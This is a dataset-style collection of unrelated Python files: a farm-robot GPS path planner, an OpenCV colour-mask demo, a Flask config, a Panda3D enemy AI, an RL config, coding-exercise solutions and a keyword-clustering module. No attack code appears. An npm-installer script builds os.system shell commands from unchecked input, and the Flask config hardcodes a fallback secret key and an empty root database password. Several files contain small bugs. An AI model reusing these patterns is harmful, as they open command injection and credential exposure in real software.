text
stringlengths 8
6.05M
|
|---|
"""
*********************************************************************
This file is part of:
The Acorn Project
https://wwww.twistedfields.com/research
*********************************************************************
Copyright (c) 2019-2021 Taylor Alexander, Twisted Fields LLC
Copyright (c) 2021 The Acorn Project contributors (cf. AUTHORS.md).
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*********************************************************************
"""
import redis
import time
import pickle
from scipy.interpolate import CubicSpline
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import matplotlib.colors as mp_colors
import sys
import utm
import scipy
import geomdl.fitting as fitting
from geomdl.visualization import VisMPL
# import open3d
import math
import random
from scipy.interpolate import splprep, splev
sys.path.append('../vehicle')
from remote_control_process import EnergySegment
import spline_lib
import gps_tools
import matplotlib.path as path
_SMOOTH_MULTIPLIER = 0.00000000001
# r = redis.Redis(
# host='acornserver.local',
# port=6379)
r = redis.Redis(
host='0.0.0.0',
port=6379)
_ROW_POINTS_CUT_OFF = 8
# self.sequence_num = sequence_num
# self.time_stamp = end_gps.time_stamp
# self.start_gps = start_gps
# self.end_gps = end_gps
# self.duration = end_gps.time_stamp - start_gps.time_stamp
# self.distance_sum = distance_sum
# self.meters_per_second = distance_sum / self.duration
# self.watt_seconds_per_meter = total_watt_seconds/distance_sum
# self.height_change = end_gps.height_m - start_gps.height_m
# self.avg_watts = avg_watts
colorlist = ["#0000FF", "#00FF00", "#FF0066"]
idx = 0
orig_x = []
orig_y = []
colors = []
path_cuts = [(0,0), (23,0), (0,48)]
final_path = []
path1 = []
path2 = []
path3 = []
paths = [path1, path2, path3]
print("%%%%%%%%%%%%%%%%%%%%%%%%")
from area import area
_SQUARE_METERS_PER_ACRE = 4046.86
poly_path = None
row_list = {}
for key in r.scan_iter():
#print(key)
if 'gpspolygon' in str(key):
print(key)
polygon = pickle.loads(r.get(key))
print(polygon["geometry"])
polygon_area = area(polygon["geometry"])
print("Polygon is {} acres".format(polygon_area/_SQUARE_METERS_PER_ACRE))
print(polygon["geometry"]["coordinates"][0])
polygon = polygon["geometry"]["coordinates"][0]
poly_path = path.Path(polygon, closed=True)
#print(poly_path)
if "twistedfields:gpspath:autogen_1_row_" in str(key):
row = pickle.loads(r.get(key))
row_list[str(key)] = row
# print(row_list.keys())
rows_in_polygon = []
for row_number in range(len(row_list)):
row_key = "b'twistedfields:gpspath:autogen_1_row_{}:key'".format(row_number+1)
row = row_list[row_key]
#print(row)
row_points_in_polygon = []
for point in row:
if poly_path.contains_point((point["lon"], point["lat"]),radius=0.0):
# print(point)
row_points_in_polygon.append(point)
elif len(row_points_in_polygon) > 0:
if len(row_points_in_polygon) > _ROW_POINTS_CUT_OFF:
rows_in_polygon.append(row_points_in_polygon)
print(len(row_points_in_polygon))
break
# def calculate_distance(point1, point2):
# p1 = np.array([point1[0], point1[1]])
# p2 = np.array([point2[0], point2[1]])
# squared_dist = np.sum((p1-p2)**2, axis=0)
# return(np.sqrt(squared_dist))
#
#
# def calculate_projection(point1, point2, distance):
# """Return a point a given distance past point2."""
# delta_x = utm_points[0][0] - utm_points[1][0]
# delta_y = utm_points[0][1] - utm_points[1][1]
# distance = calculate_distance(utm_points[0], utm_points[1])
# new_x = (projection_distance_meters * delta_x)/distance
# new_y = (projection_distance_meters * delta_y)/distance
# return point2[0] + new_x, point2[1] + new_y
projection_distance_meters = 2.0
print("$")
from remote_control_process import NavigationParameters, PathControlValues, PathSection, Direction
#self.default_navigation_parameters = NavigationParameters(travel_speed=0.0, path_following_direction=Direction.BACKWARD, vehicle_travel_direction=Direction.FORWARD, loop_path=True)
#self.default_navigation_parameters = NavigationParameters(travel_speed=0.0, path_following_direction=Direction.FORWARD, vehicle_travel_direction=Direction.BACKWARD, loop_path=True)
forward_navigation_parameters = NavigationParameters(travel_speed=0.4, path_following_direction=Direction.FORWARD, vehicle_travel_direction=Direction.FORWARD, loop_path=False)
connector_navigation_parameters = NavigationParameters(travel_speed=0.2, path_following_direction=Direction.EITHER, vehicle_travel_direction=Direction.FORWARD, loop_path=False)
#self.default_navigation_parameters = NavigationParameters(travel_speed=0.0, path_following_direction=Direction.FORWARD, vehicle_travel_direction=Direction.FORWARD, loop_path=True)
#self.default_navigation_parameters = NavigationParameters(travel_speed=0.0, path_following_direction=Direction.BACKWARD, vehicle_travel_direction=Direction.BACKWARD, loop_path=True)
_MAXIMUM_ALLOWED_DISTANCE_METERS = 8
_MAXIMUM_ALLOWED_ANGLE_ERROR_DEGREES = 140
# path_control_vals = PathControlValues(angular_p=0.9, lateral_p=-0.25, angular_d=0.3, lateral_d=-0.2)
# turn_control_vals = PathControlValues(angular_p=0.9, lateral_p=-0.25, angular_d=0.3, lateral_d=-0.2)
path_control_vals = PathControlValues(angular_p=0.7, lateral_p=-0.15, angular_d=0.4, lateral_d=-0.1)
turn_control_vals = PathControlValues(angular_p=0.7, lateral_p=-0.15, angular_d=0.4, lateral_d=-0.1)
nav_path = PathSection(points=[],
control_values=path_control_vals,
navigation_parameters=forward_navigation_parameters,
max_dist=_MAXIMUM_ALLOWED_DISTANCE_METERS,
max_angle=_MAXIMUM_ALLOWED_ANGLE_ERROR_DEGREES,
end_dist=1.0,
end_angle=45)
starting_direction = -1
rows_in_polygon = gps_tools.chain_rows(rows_in_polygon, rows_in_polygon[0][0], starting_direction, "three_pt", forward_navigation_parameters, connector_navigation_parameters, turn_control_vals, nav_path, asdict=True)
import copy
interpolate_list = []
row = rows_in_polygon[-1].points
start_points = row[-2], row[-1]
heading = gps_tools.get_heading(start_points[0], start_points[1])
row_aligned_away_pt = gps_tools.project_point(start_points[1], heading, 1.5)
latlon_point1 = gps_tools.project_point(row_aligned_away_pt, heading + 90, 0.5)
latlon_point2 = gps_tools.project_point(row_aligned_away_pt, heading + 90, 1.0)
new_turn = [latlon_point1._asdict(), latlon_point2._asdict()]
interpolate_list.append(latlon_point2._asdict())
turn1_path = copy.deepcopy(nav_path)
turn1_path.points = new_turn
turn1_path.navigation_parameters = connector_navigation_parameters
turn1_path.end_dist=1.0
turn1_path.end_angle=20
turn1_path.control_values = turn_control_vals
rows_in_polygon.append(turn1_path)
row = rows_in_polygon[0].points
start_points = row[1], row[0]
heading = gps_tools.get_heading(start_points[0], start_points[1])
row_aligned_away_pt = gps_tools.project_point(start_points[1], heading, 1.5)
latlon_point1 = gps_tools.project_point(row_aligned_away_pt, heading + -90, 1.0)
latlon_point2 = gps_tools.project_point(row_aligned_away_pt, heading + -90, 0.5)
interpolate_list.append(latlon_point2._asdict())
new_turn = [latlon_point1._asdict(), latlon_point2._asdict()]
turn1_path = copy.deepcopy(nav_path)
turn1_path.points = new_turn
turn1_path.navigation_parameters = connector_navigation_parameters
turn1_path.end_dist=1.0
turn1_path.end_angle=20
turn1_path.control_values = turn_control_vals
# print(interpolate_list)
interpolated_path_points = gps_tools.interpolate_points(interpolate_list, 25)
print(interpolated_path_points)
interpolated_path = copy.deepcopy(nav_path)
interpolated_path.points = interpolated_path_points
interpolated_path.navigation_parameters = forward_navigation_parameters
interpolated_path.end_dist=1.0
interpolated_path.end_angle=20
interpolated_path.control_values = path_control_vals
rows_in_polygon.append(interpolated_path)
rows_in_polygon.append(turn1_path)
row = rows_in_polygon[0].points
start_points = row[0], row[1]
turn1_path = copy.deepcopy(nav_path)
turn1_path.points = start_points
turn1_path.navigation_parameters = connector_navigation_parameters
turn1_path.end_dist=1.0
turn1_path.end_angle=20
turn1_path.control_values = turn_control_vals
rows_in_polygon.append(turn1_path)
# rows_in_polygon = rows_in_polygon[-8:]
r.set('twistedfields:gpspath:aaa_test:key', pickle.dumps(rows_in_polygon))
sys.exit()
min_x = 0
first_x = 0
min_y = 0
first_y = 0
mesh_array = []
colors = [[1,0,0],[0,1,0],[0,0,1]]
count = 0
lat_lon_tracks = []
for track in rows_in_polygon:
if count < len(colors):
row_color = colors[count]
else:
row_color = [random.random(), random.random(), random.random()]
count += 1
track_lat_lon = []
# track = track[3:-4]
for point in track.points:
if len(track.points) == 2:
mesh_box = open3d.geometry.TriangleMesh.create_box(width=0.8, height=0.8, depth=0.8)
else:
mesh_box = open3d.geometry.TriangleMesh.create_box(width=0.7, height=0.7, depth=0.7)
mesh_box.compute_vertex_normals()
mesh_box.paint_uniform_color(row_color)
translation = [point["lat"]* 100000 - 3735387, point["lon"] * 100000 + 12233156, 0]
print(translation)
#print("{} {}".format(point["lat"] + min_x + first_x, point["lon"] + min_y + first_y))
#latlon_point = utm.to_latlon(point["lat"] + min_x + first_x, point["lon"] + min_y + first_y, ut_zone[0], ut_zone[1])
#print(latlon_point)
#track_lat_lon.append(latlon_point)
mesh_box.translate(translation)
mesh_array.append(mesh_box)
#lat_lon_tracks.append(track_lat_lon)
pcd = open3d.geometry.PointCloud()
# np_points = np.random.rand(100, 3)
# print(np.array(point_cloud))
# From numpy to Open3D
# pcd.points = open3d.utility.Vector3dVector(gps_mesh.pcd)
# # pcd.points = open3d.utility.Vector3dVector(gps_mesh.slice_points)
#
mesh_frame = open3d.geometry.TriangleMesh.create_coordinate_frame(
size=10, origin=[0, 0, 0])
#
# mesh_array.append(pcd)
mesh_array.append(mesh_frame)
open3d.visualization.draw_geometries(mesh_array)
|
import cv2
import numpy as np
camera = cv2.VideoCapture("2.mp4") #video dosyadan okundu.
def nothing(x):
pass
cv2.namedWindow("frame")
cv2.createTrackbar("H1","frame",0,180,nothing) #TRACKBAR OLUŞTURULDU.
cv2.createTrackbar("H2","frame",0,180,nothing)
cv2.createTrackbar("S1","frame",0,255,nothing)
cv2.createTrackbar("S2","frame",0,255,nothing)
cv2.createTrackbar("V1","frame",0,255,nothing)
cv2.createTrackbar("V2","frame",0,255,nothing)
while camera.isOpened(): # kamera açıldı ise
ret,frame = camera.read()
hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV) #rgb'yi hsvye çevirdi.
H1= cv2.getTrackbarPos("H1","frame") #TRACKBAR OKUMA İŞLEMİNİ GERÇEKLEŞTİRDİK.
H2= cv2.getTrackbarPos("H2","frame")
S1= cv2.getTrackbarPos("V1","frame")
S2= cv2.getTrackbarPos("V2","frame")
V1= cv2.getTrackbarPos("S1","frame")
V2= cv2.getTrackbarPos("S2","frame")
lower = np.array([H1,S1,V1]) #hsv değerine göre renk tanımlandı .
upper = np.array([H2,S2,V2])
mask = cv2.inRange(hsv,lower,upper) #maskeleme işlemi yapıldı .
res = cv2.bitwise_and(frame,frame,mask=mask)
cv2.imshow("frame",frame) #ekrana yazdırdı.
cv2.imshow("hsv",hsv) #ekrana yazdırdı.
cv2.imshow("mask",mask) #maske ekrana yazdırıldı
cv2.imshow("res",res) #hangi renkleri geçirdiği
if cv2.waitKey(25) & 0XFF == ord("q"): # q'ya basınca çıkması saglandı.
break
cv2.destroyAllWindows() #tüm pencereler kapatıldı .
|
'''Convert to and from Roman numerals
This program is part of 'Dive Into Python 3', a free Python book for
experienced programmers. Visit http://diveintopython3.org/ for the
latest version.
'''
roman_numeral_map = (('M', 1000),
('CM', 900),
('D', 500),
('CD', 400),
('C', 100),
('XC', 90),
('L', 50),
('XL', 40),
('X', 10),
('IX', 9),
('V', 5),
('IV', 4),
('I', 1))
def to_roman(n):
'''convert integer to Roman numeral'''
if not (0 < n < 4000):
raise OutOfRangeError('number out of range (must be 1...3999)')
result = ''
for numeral, integer in roman_numeral_map:
while n >= integer:
result += numeral
n -= integer
return result
class OutOfRangeError(ValueError):
pass
# Copyright (c) 2009, Mark Pilgrim, All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 'AS IS'
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
|
#!/usr/local/bin/python3
# -*- conding: utf-8 -*-
import os
BASE_DIR = os.path.abspath(os.path.dirname(__file__))
# 定义配置基类
class Config:
# 秘钥
SECRET_KEY = os.environ.get('SECRET_KEY') or '4329581751'
# 数据库配置
SQLALCHEMY_TRACK_MODIFICATIONS = False
MYSQL_USER = 'root'
MYSQL_PASS = ''
SQLALCHEMY_DATABASE_URI = 'mysql+pymysql://{mysql_user}:{mysql_pass}@localhost/staffms'.format(
mysql_user = MYSQL_USER, mysql_pass = MYSQL_PASS)
# Redis配置
REDIS_CONFIG = {
'CACHE_TYPE': 'redis',
'CACHE_REDIS_HOST': '127.0.0.1',
'CACHE_REDIS_PORT': 6379,
'CACHE_REDIS_DB': '',
'CACHE_REDIS_PASSWORD': ''
}
# 发邮件配置
MAIL_SERVER = 'smtp.animekid.cn'
MAIL_USERNAME = ''
MAIL_PASSWORD = ''
# 额外的初始化操作
@staticmethod
def init_app(app):
pass
|
from sys import stdin
N = int(stdin.readline().strip())
for i in range(0, N):
r, e, c = [float(x) for x in input().split()]
incwith = e - c
incwithout = r
if incwithout == incwith:
print("does not matter")
if incwithout > incwith:
print("do not advertise")
if incwithout < incwith:
print("advertise")
|
# The problem is here:
# https://www.hackerrank.com/challenges/30-regex-patterns
# This was perticularly enkoyable for me cause it was my first attempt
# on regex
#!/bin/python
import sys
import re
N = int(raw_input().strip())
names = []
for a0 in range(N):
firstName,emailID = raw_input().strip().split(' ')
firstName,emailID = [str(firstName),str(emailID)]
obj = re.search(r'.*@gmail.com$', emailID)
if obj:
names.append(firstName)
names = sorted(names)
for name in names:
print name
|
from pandac.PandaModules import * #basic Panda modules
from direct.showbase.DirectObject import DirectObject #event handling
from panda3d.ai import * #panda AI
from direct.actor.Actor import Actor
import math, time
class Enemy(object):
def __init__(self, parent, spawnPos, AIpath):
self.speed = 0.4
self.sightBlocked = False
self.foundPlayer = False
self.foundPlayerTime = -1
self.spawnPos = spawnPos
self.spawnH = 0
self.parent = parent
self.startH = -1
self.blocked = False
self.justUnblocked = False
self.timeUnblocked = -1
self.initEnemy()
self.initSounds()
self.initAI(AIpath)
#Loads player node, camera, and light
def initEnemy(self):
self.enemyNode = Actor('Models/monster', {'walk':'Models/monsterWalkAnim',
'run':'Models/monsterRunAnim'})
self.enemyNode.reparentTo(render)
self.enemyNode.setScale(0.33)
self.enemyNode.setPos(self.spawnPos)
self.enemyNode.setPlayRate(1.2, 'walk')
self.enemyNode.loop('walk')
def initSounds(self):
self.stompSfx = base.loadSfx('sounds/stomp.ogg')
self.stompSfx.setLoopCount(0)
self.stompSfx.setVolume(.15)
#self.chaseSfx = base.loadSfx('Sounds/chase.wav')
#self.chaseSfx.setLoopCount(0)
self.movementSfx = None
#AIpath is a list of vertices
def initAI(self, AIpath):
self.AIworld = AIWorld(render)
self.AIchar = AICharacter('enemyNode',self.enemyNode, 100, 10, 27)
self.AIworld.addAiChar(self.AIchar)
self.AIbehaviors = self.AIchar.getAiBehaviors()
#Path follow (note the order is reveresed)
self.AIbehaviors.pathFollow(1.0)
for point in AIpath:
self.AIbehaviors.addToPath(point)
self.AIbehaviors.startFollow()
def respawn(self):
self.enemyNode.setPos(self.spawnPos)
self.enemyNode.setH(self.spawnH)
self.foundPlayer = False
def initCollisions(self, player):
envMask = BitMask32(0x1)
sightMask = BitMask32(0x2)
deathMask = BitMask32(0x4)
clearSightMask = BitMask32(0x8)
#collides with walls
cSphere = CollisionSphere( (0,0,20), 10)
cNode = CollisionNode('enemyPusher')
cNode.addSolid(cSphere)
cNode.setCollideMask(BitMask32.allOff())
cNode.setFromCollideMask(envMask)
cNodePath = self.enemyNode.attachNewNode(cNode)
base.pusher.addCollider(cNodePath, self.enemyNode)
base.cTrav.addCollider(cNodePath, base.pusher)
#cNodePath.show()
#collides with the player
cSphere = CollisionSphere( (0,0,20), 20 )
cNode = CollisionNode('enemy')
cNode.addSolid(cSphere)
cNode.setCollideMask(BitMask32.allOff())
cNode.setFromCollideMask(deathMask)
cNodePath = self.enemyNode.attachNewNode(cNode)
base.cTrav.addCollider(cNodePath, base.cHandler)
#cNodePath.show()
#collides with the player to determine if the player is in the enemie's cone of vision
cTube = CollisionTube (0,-15,0,0,-60,0, 40)
cNode = CollisionNode('vision')
cNode.addSolid(cTube)
cNode.setCollideMask(BitMask32.allOff())
cNode.setIntoCollideMask(sightMask)
cNodePath = self.enemyNode.attachNewNode(cNode)
#cNodePath.show()
#checks to see if there is anything blocking the enemie's line of sight to the player
self.queue = CollisionHandlerQueue()
cRay = CollisionRay(self.enemyNode.getX(), self.enemyNode.getY(), self.enemyNode.getZ() + 5, self.enemyNode.getX() - player.playerNode.getX(), self.enemyNode.getY() - player.playerNode.getY(), self.enemyNode.getZ() - player.playerNode.getZ())
self.cNode = CollisionNode('sight')
self.cNode.addSolid(cRay)
self.cNode.setCollideMask(BitMask32.allOff())
self.cNode.setFromCollideMask(envMask|clearSightMask)
cNodePath = base.render.attachNewNode(self.cNode)
base.cTrav.addCollider(cNodePath, self.queue)
#cNodePath.show()
#checks to see if it is blocked by a wall while patrolling
self.wallQueue = CollisionHandlerQueue()
cRay = CollisionRay(2, 0, 10, 0, -1, 0)
cNode = CollisionNode('wallSight')
cNode.addSolid(cRay)
cNode.setCollideMask(BitMask32.allOff())
cNode.setFromCollideMask(envMask|clearSightMask)
cNodePath = self.enemyNode.attachNewNode(cNode)
base.cTrav.addCollider(cNodePath, self.wallQueue)
#cNodePath.show()
base.accept('playerSight-again-vision', self.inSight)
def inSight(self, cEntry):
if not self.foundPlayer and not self.sightBlocked:
self.foundPlayer = True
self.foundPlayerTime = time.time()
#self.enemyNode.loop('run')
def update(self, dt, player):
if player.newLevel:
return
try:
self.cNode
except AttributeError:
print("enemy cnode not defined")
return
if self.AIchar.getVelocity() == LVecBase3f(0, 0, 0):
self.AIbehaviors.startFollow()
#updates the enemie's vision ray towards the player
self.cNode.modifySolid(0).setOrigin(LPoint3f (self.enemyNode.getX(), self.enemyNode.getY(), self.enemyNode.getZ() + 5))
self.cNode.modifySolid(0).setDirection(LVector3f ((self.enemyNode.getX() - player.playerNode.getX()) * -1, (self.enemyNode.getY() - player.playerNode.getY()) * -1, 0))
self.wallQueue.sortEntries()
wallSearch = True
wallSearchIndex = 0
while wallSearch == True:
if self.wallQueue.getNumEntries() > 0 and wallSearchIndex < self.wallQueue.getNumEntries():
entry = self.wallQueue.getEntry(wallSearchIndex)
type = entry.getIntoNode().getName()
if type == 'start' or type == 'exit' or ('enemy' in type and type != 'enemyPusher') or 'world' in type:
wallSearchIndex = wallSearchIndex + 1
continue
wallSearch = False
if type == 'Wall':
if self.blocked == False:
self.startH = self.enemyNode.getH()
self.blocked = True
elif 'pCube' not in type:
self.blocked = False
self.justUnblocked = True
self.timeUnblocked = time.time()
else:
wallSearch = False
if self.blocked == True:
self.blocked = False
self.justUnblocked = True
self.timeUnblocked = time.time()
#checks the first element that the enemy sees between the player
#if the first object it sees is not the player then it doesn't chase towards it
self.queue.sortEntries()
sightSearch = True
sightSearchIndex = 0
while sightSearch == True:
if self.queue.getNumEntries() > 0 and sightSearchIndex < self.queue.getNumEntries():
entry = self.queue.getEntry(sightSearchIndex)
type = entry.getIntoNode().getName()
if type == 'start' or type == 'exit' or ('enemy' in type and type != 'enemyPusher') or 'world' in type:
sightSearchIndex = sightSearchIndex + 1
continue
sightSearch = False
if type == 'playerSight':
self.sightBlocked = False
elif 'pCube' not in type:
self.sightBlocked = True
else:
sightSearch = False
#if the player is found then moves towards them
#otherwise continues patrolling
if self.foundPlayer:
self.move(dt, player)
self.parent.chaseBGM(True)
else:
self.parent.chaseBGM(False)
if self.blocked == True:
self.enemyNode.setH(self.enemyNode.getH() - 15)
elif self.justUnblocked == True:
if self.timeUnblocked + 3.0 < time.time():
self.justUnblocked = False
self.timeUnblocked = -1
else:
x_adjustment = 1
y_adjustment = 1
measure_against = self.startH % 360
if self.enemyNode.getH() < 0:
measure_against = 360 - measure_against
if measure_against >=0 and measure_against < 90:
x_adjustment = 1
y_adjustment = -1
if measure_against >=90 and measure_against < 180:
x_adjustment = 1
y_adjustment = 1
if measure_against >= 180 and measure_against < 270:
x_adjustment = -1
y_adjustment = 1
if measure_against >= 270 and measure_against < 360:
x_adjustment = -1
y_adjustment = -1
angle = self.startH - self.enemyNode.getH()
self.enemyNode.setX(self.enemyNode.getX() + x_adjustment * math.fabs(math.sin(math.radians(angle))) * self.speed)
self.enemyNode.setY(self.enemyNode.getY() + y_adjustment * math.fabs(math.cos(math.radians(angle))) * self.speed)
else:
self.AIworld.update()
if time.time() > self.foundPlayerTime + 5:
self.foundPlayer = False
#Movement SFX
#if self.foundPlayer and self.movementSfx != self.chaseSfx:
# if self.movementSfx != None:
# self.movementSfx.stop()
# self.movementSfx = self.chaseSfx
# self.movementSfx.play()
#if not self.foundPlayer and self.movementSfx != self.stompSfx:
if self.movementSfx != self.stompSfx:
if self.movementSfx != None:
self.movementSfx.stop()
self.movementSfx = self.stompSfx
self.movementSfx.play()
#Moves player
def move(self, dt, player):
hypotenuse = math.sqrt( (player.playerNode.getX() - self.enemyNode.getX())**2 + (player.playerNode.getY() - self.enemyNode.getY())**2 )
my_cos = (player.playerNode.getX() - self.enemyNode.getX()) / hypotenuse
my_sin = (player.playerNode.getY() - self.enemyNode.getY()) / hypotenuse
self.enemyNode.setPos(self.enemyNode.getX() + my_cos * self.speed, self.enemyNode.getY() + my_sin * self.speed, self.enemyNode.getZ())
self.enemyNode.lookAt(player.playerNode.getX(), player.playerNode.getY(), self.enemyNode.getZ())
self.enemyNode.setH(self.enemyNode.getH() - 180)
#if the enemy is near enough to the player, it will keep looking
if hypotenuse < 5.0 and self.sightBlocked == False:
self.foundPlayerTime = time.time()
self.foundPlayer = True
|
# Exercício 5.2 - Livro
i = 50
while i <= 100:
print(f'Número {i}')
i += 1
|
# Task3
import time
from inspect import signature
import numpy as np
import inspect
class decorator3:
def __init__(self,fun):
self.fun= fun
decorator3.fun1 = fun
decorator3.source = inspect.getsource(fun)
self.arguments= []
decorator3.count= 0
self.exe_time = 0
def __call__(self,*args):
start_time = 0
decorator3.count+= 1
self.output = self.fun(*args)
start_time = time.time()
self.fun(*args)
self.exe_time = time.time() - start_time
res = ''
res = ' ' + str(decorator3.fun1.__name__) + ' ' + 'call:' + ' ' + str(self.count) + ' ' + 'executed in' + ' ' + str(format(self.exe_time, '.8f')) + ' ' + 'sec' + '\n'
self.docstring = decorator3.fun1.__doc__
self.type1 = type(self.fun)
self.name = self.fun.__name__
self.output = self.fun(*args)
self.key =[]
self.value =[]
self.signature = inspect.signature(self.fun)
self.Keyworded = {
k: v.default
for k, v in self.signature.parameters.items()
if v.default is not inspect.Parameter.empty
}
self.positional = [
k
for k, v in self.signature.parameters.items()
if v.default is inspect.Parameter.empty
]
res += 'Name:' + '\t' + str(self.name) + '\n'
res += 'Type:' + '\t' + str(self.type1) + '\n'
res += 'Sign:' + '\t' + str(self.signature) + '\n'
res += 'Args:' + '\t' + 'positional' + str(self.positional) + '\n'
res += ' ' + '\t' + 'Key=worded' + str(self.Keyworded) + '\n'
res += 'Docs:' + '\t' + str(self.docstring) + '\n'
res += 'Source:'+ '\t' + decorator3.source + '\n'
res += 'Output:' + '\t' + str(self.output)
with open('Dumped.txt', 'w') as dump:
dump.write(res)
with open('Dumped.txt', 'r') as dump1:
read = dump1.read()
print(read)
return self.exe_time
|
import numpy as np
import tensorflow as tf
from tensorflow.contrib.slim import fully_connected
from tensorflow.python.ops.rnn_cell_impl import _RNNCell as RNNCell
import sys
from dps import cfg
from dps.config import DEFAULT_CONFIG
from dps.train import training_loop
from dps.env.room import Room
from dps.rl import RLUpdater
from dps.rl.value import (
PolicyEvaluation, ProximalPolicyEvaluation, TrustRegionPolicyEvaluation,
NeuralValueEstimator)
from dps.rl.policy import Policy, Deterministic
from dps.utils.tf import FeedforwardCell
def build_env():
return Room()
class GoToPoint(RNNCell):
def __init__(self, point=None):
if point is None:
point = (0, 0)
self.point = np.array(point).reshape(1, -1)
def __call__(self, inp, state, scope=None):
with tf.name_scope(scope or 'go_to_point'):
batch_size = tf.shape(inp)[0]
return (self.point - inp[:, :2]), tf.fill((batch_size, 1), 0.0)
@property
def state_size(self):
return 1
@property
def output_size(self):
return 2
def zero_state(self, batch_size, dtype):
return tf.fill((batch_size, 1), 0.0)
def get_updater(env):
policy = Policy(GoToPoint(), Deterministic(2), env.obs_shape)
# controller = FeedforwardCell(lambda inp, output_size: MLP([128, 128])(inp, output_size), 1)
controller = FeedforwardCell(lambda inp, output_size: fully_connected(inp, output_size, activation_fn=None), 1)
estimator = NeuralValueEstimator(controller, env.obs_shape)
alg = cfg.alg_class(estimator, name="critic")
updater = RLUpdater(env, policy, alg)
return updater
config = DEFAULT_CONFIG.copy(
get_updater=get_updater,
build_env=build_env,
log_name="policy_evaluation",
max_steps=100000,
display_step=100,
T=3,
reward_radius=0.2,
max_step=0.1,
restart_prob=0.0,
l2l=False,
n_val=200,
threshold=1e-4,
verbose=False,
)
x = int(sys.argv[1])
if x == 0:
print("TRPE")
config.update(
name="TRPE",
delta_schedule='0.01',
max_cg_steps=10,
max_line_search_steps=10,
alg_class=TrustRegionPolicyEvaluation
)
elif x == 1:
print("PPE")
config.update(
name="PPE",
optimizer_spec="rmsprop",
lr_schedule="1e-2",
epsilon=0.2,
opt_steps_per_update=100,
S=1,
alg_class=ProximalPolicyEvaluation
)
else:
print("PE")
config.update(
name="PolicyEvaluation",
optimizer_spec='rmsprop',
lr_schedule='1e-5',
opt_steps_per_update=100,
alg_class=PolicyEvaluation
)
with config:
cfg.update_from_command_line()
training_loop()
|
def singlenum(nums):
|
import sys
import json
import os
path=sys.argv[1]
libname=sys.argv[2]
print(path)
f=open(path,'r')
jf=json.loads(f.read())
os.system('mkdir libs')
os.system('mkdir libs/' + libname)
versions=jf['versions']
print(versions)
print('=====================')
for v in versions:
print('Installing ' + libname + ' ' + v)
os.system('mkdir libs/' + libname + '/' + v)
cmd='npm install ' + libname + '@' + v + ''
print(cmd)
os.system(cmd)
os.system('mv node_modules/' + libname + '/*' + ' libs/' + libname + '/' + v + '/')
os.system('rm -rf node_modules/')
print('The lib has been installed. Now importing lib info to DB')
|
from Deck import *
from Player import *
class Util:
@staticmethod
def moveListOrder(listv):
if(type(listv) == list and listv!=[]):
listv = listv[1:]+[listv[0]]
return listv
@staticmethod
def chooseDirection(playerNameList,dir=True):
if(len(playerNameList)>2 and dir == False):
temp = playerNameList[1:]
temp.reverse()
playerNameList=[playerNameList[0]]+temp
return playerNameList
else:
return playerNameList
@staticmethod
def distributeCardToPlayers(players,deck):
deck.shuffle()
idx = 0
playercount = len(players)
while(deck!=[]):
idx %=playercount
players[idx].importCard(deck[0])
idx += 1
deck = deck[1:]
return players
|
# -*- coding: utf-8 -*-
"""
Advenced String Analysis Methods
contains of the following functions:
- Wordstemm Cluster : wordstemm_clusters
... clusters lines of text into wordstemm items, groups them one-hot encodes
them and returns a filtered dataframe with the original data plus
corresponding wordstemms and one-hot encoding and one dataframe with just
all the string lines falling into a corresponding wordstemm.
-...
Created on Thu Mar 14 10:43:34 2019
@author: Markus.Meister
"""
#%% -- imports --
import pandas as pd
import numpy as np
from scii_funs import *
from df_funs import write_df_to_excel, eval_value_dfs, dict_to_df, mean_values_df
#%% -- globals --
w_words_ = np.array([
"wer ",
"wem ",
"wen ",
"wessen ",
"wie ",
"wann ",
"wo ",
"welche",
"was ",
"wobei ",
"womit ",
"woran ",
"wohin ",
"wobei ",
"wo ",
"weshalb ",
"warum ",
"wieso ",
"wieviel"
"worauf ",
"worum ",
"wovor ",
"wodurch ",
"woher ",
"weswegen ",
"woraus ",
])
q_words_ = np.array([
"who ",
"whom ",
"whose ",
"when ",
"which ",
"what ",
"what's",
"where ",
"why ",
"how ",
])
#%% -- functions --
"""
Wordstemm Clusters
This function clusters strings in "wordstemms"
"""
def wordstemm_clusters(
my_data = None,
str_key = 'Keyword',
filter_keys = [
'Wettbewerber / Aufteilung',
'Organisch vs. Paid',
'Keyword',
'Ø Suchanfragen pro Monat',
],
en_qflg = 0, de_qflg = 1,
n_st_min = 4,
thresholds = (4,500),
):
# re-defining globals to avoid possible overwrites (probably unnecessary)
q_words = q_words_.copy()
w_words = w_words_.copy()
if type(my_data) == type(None):
return None
raw = my_data[str_key].values.tolist()
if not en_qflg:
q_words = np.array([])
if not de_qflg:
w_words = np.array([])
#generate set of all possible groupings
groups = set()
for line in raw:
data = line.strip().split()
for item in data:
if len(item) >= n_st_min:
groups.add(item)
